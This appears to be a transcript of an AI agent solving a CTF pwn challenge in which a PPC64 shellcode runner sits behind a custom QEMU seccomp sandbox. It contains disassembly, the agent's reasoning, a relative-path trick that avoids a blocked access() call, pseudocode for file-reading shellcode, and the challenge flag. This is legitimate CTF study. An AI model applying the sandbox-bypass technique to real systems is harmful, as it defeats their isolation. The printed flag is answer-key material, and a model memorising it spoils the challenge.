# Thread Handoff

- Thread: bright-signal-3291
- UUID: ff070b6d-9e1a-4443-b9dc-b49807c7cc19
- CTF: midnight-sun-ctf-2026-quals
- Challenge: speed-4
- Runtime: codex
- Model: gpt-5.5
- Status: completed

## Transcript

- **Assistant:** I’ll inspect the local challenge files first to identify the service behavior before touching the remote endpoint. I’ll also post concise progress notes to the webhook when there’s something concrete to report.
- **Assistant:** The challenge ships a statically linked big-endian PowerPC64 binary plus its QEMU runner. I’m going to run it locally and inspect symbols/strings to pin down the protocol.
- **Assistant:** The bundled QEMU binary is present but lacks the executable bit, so the local runner currently fails with `Permission denied`. I’m checking whether there’s a system QEMU available before requesting a permission change.
- **Assistant:** The challenge mount itself is read-only, so I can’t chmod the bundled runner in place. I’ll copy it into `/workspace` and execute that copy, which keeps the challenge files untouched.
- **Assistant:** Local execution shows the service is a shellcode runner: it asks for a shellcode size, reads bytes, mmaps, and executes. The next step is to reverse the mmap constraints and any filters so we can send PPC64 shellcode that prints the flag.
- **Assistant:**
  ```text
  INFO: Analyze len bytes of instructions for references (aar)
  ```
- **Assistant:**
  ```text
  INFO: Finding and parsing C++ vtables (avrr)
  INFO: Analyzing methods (af @@ method.*)
  INFO: Emulate functions to find computed references (aaef)
  INFO: Recovering local variables (afva@@@F)
  INFO: Type matching analysis for all functions (aaft)
  INFO: Propagate noreturn information (aanr)
  INFO: Use -AA or aaaa to perform additional experimental analysis
  INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav)
  ┌ 180: int main (void *s, char **argv, char **envp, int64_t arg4, int64_t arg_70h, int64_t arg_7ch, int64_t arg_84h, int64_t arg_488h, int64_t arg_10h); // noreturn
  │ `- args(r3, r4, r5, r9, sp[0x10..0x488])
  │ 0x10000f54 7c0802a6 mflr r0
  │ 0x10000f58 f8010010 std r0, 0x10(r1)
  │ 0x10000f5c fbe1fff8 std r31, -8(r1)
  │ 0x10000f60 f821fb61 stdu r1, -0x4a0(r1)
  │ 0x10000f64 7c3f0b78 mr r31, r1
  │ 0x10000f68 7c691b78 mr r9, r3 ; argc
  │ 0x10000f6c f89f0070 std r4, 0x70(r31) ; 0x100d7e70 ; argv
  │ 0x10000f70 913f007c stw r9, 0x7c(r31) ; 0x100d7e7c ; arg4
  │ 0x10000f74 e92d8ff0 ld r9, -0x7010(r13)
  │ 0x10000f78 f93f0488 std r9, 0x488(r31) ; 0x100d8288
  │ 0x10000f7c 39200000 li r9, 0
  │ 0x10000f80 393f0088 addi r9, r31, 0x88
  │ 0x10000f84 39400400 li r10, 0x400
  │ 0x10000f88 7d455378 mr r5, r10 ; size_t n
  │ 0x10000f8c 38800000 li r4, 0 ; int c
  │ 0x10000f90 7d234b78 mr r3, r9 ; void *s
  │ 0x10000f94 4801ef8d bl sym.memset ; void *memset(void *s, int c, size_t n)
  │ 0x10000f98 60000000 nop
  │ 0x10000f9c 60000000 nop
  │ 0x10000fa0 39228890 addi r9, r2, -0x7770
  │ 0x10000fa4 e9290000 ld r9, 0(r9) ; str.__0
  │ ; 0x100a7e00 ; "__0"
  │ 0x10000fa8 38c00000 li r6, 0 ; size_t size
  │ 0x10000fac 38a00002 li r5, 2 ; int mode
  │ 0x10000fb0 38800000 li r4, 0 ; char *buf
  │ 0x10000fb4 7d234b78 mr r3, r9 ; FILE*stream
  │ 0x10000fb8 48008f89 bl sym.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
  │ 0x10000fbc 60000000 nop
  │ 0x10000fc0 60000000 nop
  │ 0x10000fc4 39228888 addi r9, r2, -0x7778
  │ 0x10000fc8 e9290000 ld r9, 0(r9) ; str.__0
  │ ; 0x100a7e00 ; "__0"
  │ 0x10000fcc 38c00000 li r6, 0 ; size_t size
  │ 0x10000fd0 38a00002 li r5, 2 ; int mode
  │ 0x10000fd4 38800000 li r4, 0 ; char *buf
  │ 0x10000fd8 7d234b78 mr r3, r9 ; FILE*stream
  │ 0x10000fdc 48008f65 bl sym.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
  │ 0x10000fe0 60000000 nop
  │ 0x10000fe4 3c62fffc addis r3, r2, -4 ; 0x100a7e00 ; "__0"
  │ 0x10000fe8 3863a258 addi r3, r3, -0x5da8 ; 0x100a2058 ; "[ANSI-colored ASCII-art banner string]" ; const char *s
  │ 0x10000fec 48008c25 bl sym.puts ; int puts(const char *s)
  │ 0x10000ff0 60000000 nop
  │ 0x10000ff4 3c62fffc addis r3, r2, -4 ; 0x100a7e00 ; "__0"
  │ 0x10000ff8 3863ac78 addi r3, r3, -0x5388 ; 0x100a2a78 ; "shellcode size:" ; const char *format
  │ 0x10000ffc 48002855 bl sym.__printf ; int printf(const char *format)
  │ 0x10001000 60000000 nop
  └ 0x10001004 4bfffd79 bl sym.read_int
  ```
- **Assistant:**
  ```text
  ERROR: Cannot determine entrypoint, using 0x10000a1c
  WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
  0x10001000 60000000 nop
  0x10001004 4bfffd79 bl sym.read_int
  0x10001008 7c691b78 mr r9, r3
  0x1000100c 913f0084 stw r9, 0x84(r31)
  0x10001010 e93f0086 lwa r9, 0x84(r31)
  0x10001014 7d244b78 mr r4, r9
  0x10001018 3c62fffc addis r3, r2, -4
  0x1000101c 3863ac90 addi r3, r3, -0x5370
  0x10001020 48002831 bl sym.__printf
  0x10001024 60000000 nop
  0x10001028 813f0084 lwz r9, 0x84(r31)
  0x1000102c 2c090400 cmpwi r9, 0x400
  0x10001030 4081001c ble 0x1000104c
  0x10001034 3c62fffc addis r3, r2, -4
  0x10001038 3863ac98 addi r3, r3, -0x5368
  0x1000103c 48008bd5 bl sym.puts
  0x10001040 60000000 nop
  0x10001044 39200001 li r9, 1
  ┌─< 0x10001048 4800007c b 0x100010c4
  │ 0x1000104c 3c62fffc addis r3, r2, -4
  │ 0x10001050 3863acc0 addi r3, r3, -0x5340
  │ 0x10001054 480027fd bl sym.__printf
  │ 0x10001058 60000000 nop
  │ 0x1000105c e95f0086 lwa r10, 0x84(r31)
  │ 0x10001060 60000000 nop
  │ 0x10001064 39228890 addi r9, r2, -0x7770
  │ 0x10001068 e9090000 ld r8, 0(r9)
  │ 0x1000106c 393f0088 addi r9, r31, 0x88
  │ 0x10001070 7d064378 mr r6, r8
  │ 0x10001074 7d455378 mr r5, r10
  │ 0x10001078 38800001 li r4, 1
  │ 0x1000107c 7d234b78 mr r3, r9
  │ 0x10001080 48008931 bl sym._IO_fread
  │ 0x10001084 60000000 nop
  │ 0x10001088 e95f0086 lwa r10, 0x84(r31)
  │ 0x1000108c 393f0088 addi r9, r31, 0x88
  │ 0x10001090 7d445378 mr r4, r10
  │ 0x10001094 7d234b78 mr r3, r9
  │ 0x10001098 4bfffd6d bl sym.execute_shellcode
  │ 0x1000109c 7c691b78 mr r9, r3
  │ 0x100010a0 2c090000 cmpwi r9, 0
  │ 0x100010a4 4182001c beq 0x100010c0
  │ 0x100010a8 3c62fffc addis r3, r2, -4
  │ 0x100010ac 3863acd0 addi r3, r3, -0x5330
  │ 0x100010b0 48008b61 bl sym.puts
  │ 0x100010b4 60000000 nop
  │ 0x100010b8 39200001 li r9, 1
  ┌──< 0x100010bc 48000008 b 0x100010c4
  ││ 0x100010c0 39200000 li r9, 0
  └└─> 0x100010c4 7d2907b4 extsw r9, r9
  0x100010c8 e91f0488 ld r8, 0x488(r31)
  0x100010cc e94d8ff0 ld r10, -0x7010(r13)
  0x100010d0 7d085279 xor. r8, r8, r10
  0x100010d4 39400000 li r10, 0
  0x100010d8 4182000c beq 0x100010e4
  0x100010dc 48025005 bl sym.__stack_chk_fail_local
  0x100010e0 60000000 nop
  0x100010e4 7d234b78 mr r3, r9
  0x100010e8 383f04a0 addi r1, r31, 0x4a0
  0x100010ec e8010010 ld r0, 0x10(r1)
  0x100010f0 7c0803a6 mtlr r0
  0x100010f4 ebe1fff8 ld r31, -8(r1)
  0x100010f8 4e800020 blr
  0x100010fc 00000000 invalid
  0x10001100 00000001 invalid
  0x10001104 80010001 lwz r0, 1(r1)
  0x10001108 60000000 nop
  0x1000110c 60000000 nop
  ;-- call_fini:
  0x10001110 7c0802a6 mflr r0
  0x10001114 fbc1fff0 std r30, -0x10(r1)
  0x10001118 fbe1fff8 std r31, -8(r1)
  0x1000111c f8010010 std r0, 0x10(r1)
  0x10001120 f821ff71 stdu r1, -0x90(r1)
  0x10001124 3fe2ffff addis r31, r2, -1
  0x10001128 3fc2ffff addis r30, r2, -1
  0x1000112c 3bffe9e8 addi r31, r31, -0x1618
  0x10001130 3bdee9d8 addi r30, r30, -0x1628
  0x10001134 7fdef850 subf r30, r30, r31
  0x10001138 f8410028 std r2, 0x28(r1)
  0x1000113c 7fde1e75 sradi. r30, r30, 3
  0x10001140 4182008c beq 0x100011cc
  0x10001144 73c90001 andi. r9, r30, 1
  0x10001148 fba10078 std r29, 0x78(r1)
  0x1000114c 3bbeffff addi r29, r30, -1
  0x10001150 41820030 beq 0x10001180
  0x10001154 e93ffff9 ldu r9, -8(r31) ; 0x100d7df8
  0x10001158 e9490000 ld r10, 0(r9)
  0x1000115c e9690010 ld r11, 0x10(r9)
  0x10001160 7d4903a6 mtctr r10
  0x10001164 e8490008 ld r2, 8(r9)
  0x10001168 4e800421 bctrl
  0x1000116c e8410028 ld r2, 0x28(r1)
  0x10001170 7fbeeb79 or. r30, r29, r29
  0x10001174 41820054 beq 0x100011c8
  0x10001178 60000000 nop
  0x1000117c 60420000 ori r2, r2, 0
  0x10001180 e93ffff8 ld r9, -8(r31) ; 0x100d7df8
  0x10001184 3bdeffff addi r30, r30, -1
  0x10001188 3bfffff0 addi r31, r31, -0x10
  0x1000118c e9490000 ld r10, 0(r9)
  0x10001190 e9690010 ld r11, 0x10(r9)
  0x10001194 7d4903a6 mtctr r10
  0x10001198 e8490008 ld r2, 8(r9)
  0x1000119c 4e800421 bctrl
  0x100011a0 e8410028 ld r2, 0x28(r1)
  0x100011a4 e93f0000 ld r9, 0(r31) ; 0x100d7e00
  0x100011a8 e9490000 ld r10, 0(r9)
  0x100011ac e9690010 ld r11, 0x10(r9)
  0x100011b0 7d4903a6 mtctr r10
  0x100011b4 e8490008 ld r2, 8(r9)
  0x100011b8 4e800421 bctrl
  0x100011bc e8410028 ld r2, 0x28(r1)
  0x100011c0 37deffff addic. r30, r30, -1
  0x100011c4 4082ffbc bne 0x10001180
  0x100011c8 eba10078 ld r29, 0x78(r1)
  0x100011cc 480a0e4d bl sym._fini
  0x100011d0 60000000 nop
  0x100011d4 38210090 addi r1, r1, 0x90
  0x100011d8 e8010010 ld r0, 0x10(r1)
  0x100011dc ebc1fff0 ld r30, -0x10(r1)
  ```
- **Assistant:**
  ```text
  ERROR: Cannot determine entrypoint, using 0x10000a1c
  WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
  ERROR: Cannot find function at 0x10000e04
  ```
- **Assistant:** The sandbox setup is just `prctl(0x1337)` before jumping into the shellcode; the program ignores the return value. I’m treating the intended solve as direct PPC64 Linux shellcode and testing it locally under the supplied QEMU.
- **Assistant:**
  ```text
  dpkg-query: no path found matching pattern *bin/powerpc*linux*-as*
  [ERROR] Could not find 'as' installed for ContextType(arch = 'powerpc', bits = 64, endian = 'big', newline = b'\n', os = 'linux')
      Try installing binutils for this architecture:
      https://docs.pwntools.com/en/stable/install/binutils.html
  Traceback (most recent call last):
    File "", line 3, in
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/context/__init__.py", line 1716, in setter
      return function(*a, **kw)
             ^^^^^^^^^^^^^^^^^^
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 794, in asm
      assembler = _assembler()
                  ^^^^^^^^^^^^
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 253, in _assembler
      gas, version = which_binutils('as', check_version=True)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/context/__init__.py", line 1716, in setter
      return function(*a, **kw)
             ^^^^^^^^^^^^^^^^^^
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 248, in which_binutils
      print_binutils_instructions(util, context)
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 136, in print_binutils_instructions
      log.error("""
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/log.py", line 439, in error
      raise PwnlibException(message % args)
  pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType(arch = 'powerpc', bits = 64, endian = 'big', newline = b'\n', os = 'linux')
      Try installing binutils for this architecture:
      https://docs.pwntools.com/en/stable/install/binutils.html
  ```
- **Assistant:**
  ```text
  Ubuntu clang version 21.1.8 (6ubuntu1)
  Target: x86_64-pc-linux-gnu
  Thread model: posix
  InstalledDir: /usr/lib/llvm-21/bin
  ```
- **Assistant:** The preinstalled pwntools path lacks a PPC cross-assembler, but Clang has an integrated PPC64 assembler. The sandbox blocks temporary object output, so I’ll use `/workspace` for generated assembly/object artifacts.
- **Assistant:**
  ```text
  /bin/bash: line 1: 3 Done python3 -c "import sys; d=open('/workspace/solve.o','rb').read()[0x40:0x40+0x66]; sys.stdout.buffer.write(str(len(d)).encode()+b'\n'+d)"
  4 Bad system call (core dumped) | /workspace/qemu-ppc64 /challenge/speed4
  ```
- **Assistant:** The straightforward `open/read/write` shellcode dies with `Bad system call`, so the custom `prctl(0x1337)` is active in the provided QEMU and blocks `open`. I’m now reversing the runner/sandbox path to see which syscalls are allowed or how to bypass it.
- **Assistant:**
  ```text
  WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
  84572 0x00c791cb 0x000411d0 28 29 .debug_str ascii init_sandbox_open_read_write
  84702 0x00c79967 0x0004196c 25 26 .debug_str ascii init_sandbox_write_stdout
  36949 0x00326411 0x00326411 27 28 .rodata ascii Enabling Shellcode Sandbox\n
  ```
- **Assistant:**
  ```text
  16a887: 0f 84 21 1b 00 00       je 16c3ae
  16a88d: 48 81 fb 38 13 00 00    cmp $0x1338,%rbx
  16a894: 0f 85 2d 11 00 00       jne 16b9c7
  16a89a: ba 1b 00 00 00          mov $0x1b,%edx
  16a89f: 48 8b 0d 6a 3c 32 00    mov 0x323c6a(%rip),%rcx # 48e510
  16a8a6: be 01 00 00 00          mov $0x1,%esi
  16a8ab: 48 8d 3d 5f bb 1b 00    lea 0x1bbb5f(%rip),%rdi # 326411 <__func__.5+0xa31>
  16a8b2: bb 01 00 00 80          mov $0x80000001,%ebx
  16a8b7: e8 b4 42 0e 00          call 24eb70 <_IO_fwrite>
  16a8bc: 48 c1 e3 05             shl $0x5,%rbx
  16a8c0: 45 31 c0                xor %r8d,%r8d
  16a8c3: 31 c9                   xor %ecx,%ecx
  16a8c5: 48 89 9d d0 ee ff ff    mov %rbx,-0x1130(%rbp)
  16a8cc: 31 d2                   xor %edx,%edx
  16a8ce: be 01 00 00 00          mov $0x1,%esi
  16a8d3: 48 b8 15 00 00 01 01    movabs $0x101000015,%rax
  16a8da: 00 00 00
  16a8dd: 48 89 85 c8 ee ff ff    mov %rax,-0x1138(%rbp)
  16a8e4: bf 26 00 00 00          mov $0x26,%edi
  16a8e9: 48 bb 15 00 00 01 3c    movabs $0x3c01000015,%rbx
  16a8f0: 00 00 00
  16a8f3: 48 89 85 d8 ee ff ff    mov %rax,-0x1128(%rbp)
  16a8fa: 48 b8 06 00 00 00 00    movabs $0x7fff000000000006,%rax
  16a901: 00 ff 7f
  16a904: 48 89 85 e0 ee ff ff    mov %rax,-0x1120(%rbp)
  16a90b: 48 89 85 f0 ee ff ff    mov %rax,-0x1110(%rbp)
  16a912: 48 89 85 00 ef ff ff    mov %rax,-0x1100(%rbp)
  --
  16c39d: e9 33 7f ff ff          jmp 1642d5
  16c3a2: 49 c7 c0 f2 ff ff ff    mov $0xfffffffffffffff2,%r8
  16c3a9: e9 ba 55 ff ff          jmp 161968
  16c3ae: 48 8b 0d 5b 21 32 00    mov 0x32215b(%rip),%rcx # 48e510
  16c3b5: ba 1b 00 00 00          mov $0x1b,%edx
  16c3ba: be 01 00 00 00          mov $0x1,%esi
  16c3bf: 48 8d 3d 4b a0 1b 00    lea 0x1ba04b(%rip),%rdi # 326411 <__func__.5+0xa31>
  16c3c6: 48 bb 15 00 00 01 01    movabs $0x101000015,%rbx
  16c3cd: 00 00 00
  16c3d0: e8 9b 27 0e 00          call 24eb70 <_IO_fwrite>
  16c3d5: 48 89 9d d8 ee ff ff    mov %rbx,-0x1128(%rbp)
  16c3dc: 31 c9                   xor %ecx,%ecx
  16c3de: 31 d2                   xor %edx,%edx
  16c3e0: 45 31 c0                xor %r8d,%r8d
  16c3e3: be 01 00 00 00          mov $0x1,%esi
  16c3e8: bf 26 00 00 00          mov $0x26,%edi
  16c3ed: 48 bb 15 00 00 01 02    movabs $0x201000015,%rbx
  16c3f4: 00 00 00
  16c3f7: 48 b8 06 00 00 00 00    movabs $0x7fff000000000006,%rax
  16c3fe: 00 ff 7f
  16c401: 48 89 9d e8 ee ff ff    mov %rbx,-0x1118(%rbp)
  16c408: 48 bb 15 00 00 01 01    movabs $0x10101000015,%rbx
  16c40f: 01 00 00
  16c412: 48 89 85 d0 ee ff ff    mov %rax,-0x1130(%rbp)
  16c419: 48 89 85 e0 ee ff ff    mov %rax,-0x1120(%rbp)
  16c420: 48 89 85 f0 ee ff ff    mov %rax,-0x1110(%rbp)
  16c427: 48 89 9d f8 ee ff ff    mov %rbx,-0x1108(%rbp)
  ```
- **Assistant:**
  ```text
  /bin/bash: line 1: 623 Bad system call (core dumped) strace -f -e trace=%file,%process,%desc,prctl /workspace/qemu-ppc64 /challenge/speed4 < <(python3 -c "import sys; d=open('/workspace/solve.o','rb').read()[0x40:0x40+0x66]; sys.stdout.buffer.write(str(len(d)).encode()+b'\n'+d)")
  ```
- **Assistant:** The SIGSYS was not the actual `openat`; QEMU first tried `access("/usr/gnemul/qemu-ppc64/...")` for an absolute guest path, and `access` is not whitelisted. The workaround is to use a relative traversal path like `../../../../flag`, which avoids QEMU’s absolute-path prefix check.
- **Assistant:** The relative-path variant successfully printed `/etc/hostname` locally before the runner died during teardown, which is good enough for the remote flag read. I’ve rebuilt the payload for `../../../../flag` and I’m sending it to the challenge service now.
- **Assistant:**
  ```text
  [ASCII-art banner]
  shellcode size: 105
  shellcode: @€8
  ```
- **Assistant:** The first remote read did not produce flag text, so the file is probably not at `/flag` or the service has a different working directory layout. I’m going to reuse the same shellcode bytes with different relative filenames; the branch offsets are fixed, so only the trailing path string changes.
- **Assistant:**
  ```text
  flag => b'midnight{ad5edf1df154888fb40e3d1337f89c84}\n'
  FOUND midnight{ad5edf1df154888fb40e3d1337f89c84}
  ```
- **Assistant:** Solved.

  Flag:

  ```text
  midnight{ad5edf1df154888fb40e3d1337f89c84}
  ```

  The binary is a PPC64 big-endian shellcode runner. It reads a size up to `0x400`, mmaps RW memory, copies shellcode, mprotects it RX, calls `prctl(0x1337)`, then jumps to the shellcode.

  The bundled QEMU implements that `prctl(0x1337)` as a seccomp sandbox. Direct absolute paths like `/flag` fail because QEMU first calls host `access("/usr/gnemul/qemu-ppc64/...")`, and `access` is not allowed by the filter. The fix was to use a relative path instead.

  I used PPC64 shellcode that does:

  ```text
  open("flag", O_RDONLY)
  read(fd, stack_buf, 256)
  write(1, stack_buf, n)
  exit(0)
  ```

  The final remote payload with path `flag` returned the flag immediately. The working assembly is in [solve.S](/workspace/solve.S).
- **System:** Thread completed